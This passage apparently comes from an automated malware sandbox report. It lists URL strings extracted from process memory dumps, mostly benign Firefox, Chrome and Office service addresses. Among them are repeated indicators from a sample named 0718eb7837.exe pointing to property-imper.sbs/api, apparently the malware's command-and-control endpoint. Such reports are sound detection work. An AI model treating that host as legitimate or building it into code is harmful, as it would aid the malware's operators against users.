Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F73723000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: 0718eb7837.exe, 00000010.00000002.3097894570.00000000016B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/
Source: 0718eb7837.exe, 0000000E.00000003.2695338579.000000000150D000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2695385436.0000000001519000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/..
Source: 0718eb7837.exe, 0000000E.00000003.2694483547.00000000014F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/4
Source: 0718eb7837.exe, 0000000E.00000003.2694420134.0000000001509000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2801637630.000000000151A000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2695385436.0000000001519000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2746298150.000000000150C000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2719534998.0000000001519000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2800427547.0000000005E92000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659619178.000000000150D000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2718722019.000000000150C000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2718825525.0000000001519000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000002.3094604903.000000000165E000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000002.3100558424.00000000016EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/api
Source: 0718eb7837.exe, 0000000E.00000003.2694420134.0000000001509000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/api7
Source: 0718eb7837.exe, 00000010.00000002.3100558424.00000000016EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apiJ
Source: 0718eb7837.exe, 00000010.00000002.3094604903.000000000165E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/api_
Source: 0718eb7837.exe, 0000000E.00000003.2718722019.000000000150C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apiatePr
Source: 0718eb7837.exe, 0000000E.00000003.2746364474.0000000001519000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2746298150.000000000150C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apid
Source: 0718eb7837.exe, 0000000E.00000003.2719534998.0000000001519000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2718722019.000000000150C000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2718825525.0000000001519000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apik
Source: 0718eb7837.exe, 0000000E.00000003.2746364474.0000000001519000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2746298150.000000000150C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apim
Source: 0718eb7837.exe, 0000000E.00000003.2719534998.0000000001519000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2718722019.000000000150C000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2718825525.0000000001519000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/api~
Source: 0718eb7837.exe, 0000000E.00000003.2746725809.00000000014F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/l
Source: 0718eb7837.exe, 00000010.00000002.3094604903.0000000001641000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs:443/api
Source: 0718eb7837.exe, 00000010.00000002.3094604903.0000000001641000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs:443/api:t
Source: 0718eb7837.exe, 00000010.00000002.3094604903.0000000001641000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs:443/apiK
Source: 0718eb7837.exe, 0000000E.00000003.2694420134.0000000001509000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs:443/apilowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaK
Source: 0718eb7837.exe, 00000010.00000002.3094604903.0000000001641000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs:443/apin
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3127317780.0000024F6446D000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: chrome.exe, 00000022.00000002.2931029345.00006DEC00078000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 0000001E.00000003.2787260190.0000019DE585A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3378129656.0000024F74BB2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: chrome.exe, 00000022.00000002.2999783272.00006DEC004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3006058560.00006DEC0081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3005873380.00006DEC0080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000022.00000002.2999783272.00006DEC004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3006058560.00006DEC0081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3005873380.00006DEC0080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: 0718eb7837.exe, 0000000E.00000003.2660134888.0000000005EF4000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2820636417.0000000005E9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F701E2000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: 0718eb7837.exe, 00000010.00000003.2898670007.0000000005F63000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 0718eb7837.exe, 00000010.00000003.2898670007.0000000005F63000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2031655381.00000000236B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, 00000000.00000002.2130376795.0000000000CC5000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1893691030.000000001D201000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2660387207.0000000005EEE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2660198162.0000000005EED000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2660134888.0000000005EF4000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2694274027.0000000005EEE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2694547037.0000000005EEE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2848517492.0000000005E95000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2850943174.0000000005E95000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2820636417.0000000005E9C000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2823245706.0000000005E95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000002.2130376795.0000000000CC5000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: 0718eb7837.exe, 0000000E.00000003.2660198162.0000000005EC9000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2823245706.0000000005E70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: file.exe, 00000000.00000002.2130376795.0000000000CC5000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1893691030.000000001D201000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2660198162.0000000005EED000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2660134888.0000000005EF4000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2848517492.0000000005E95000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2850943174.0000000005E95000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2820636417.0000000005E9C000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2823245706.0000000005E95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 0718eb7837.exe, 0000000E.00000003.2660198162.0000000005EC9000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2823245706.0000000005E70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: file.exe, 00000000.00000002.2130376795.0000000000CC5000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: 0718eb7837.exe String found in binary or memory: https://www.amazon.com/?tag=admarketus-
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2800298757.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2745898979.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2777576884.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2801780586.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2943434775.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2940508064.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2943608468.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2940443306.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2899808146.0000023BA08CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2898025949.00000139662C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3219423651.0000024F6FBAC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 0000001E.00000003.2786740270.0000019DE583C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787450056.0000019DE5877000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2785045981.0000019DE7B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2786290787.0000019DE581F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787260190.0000019DE585A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
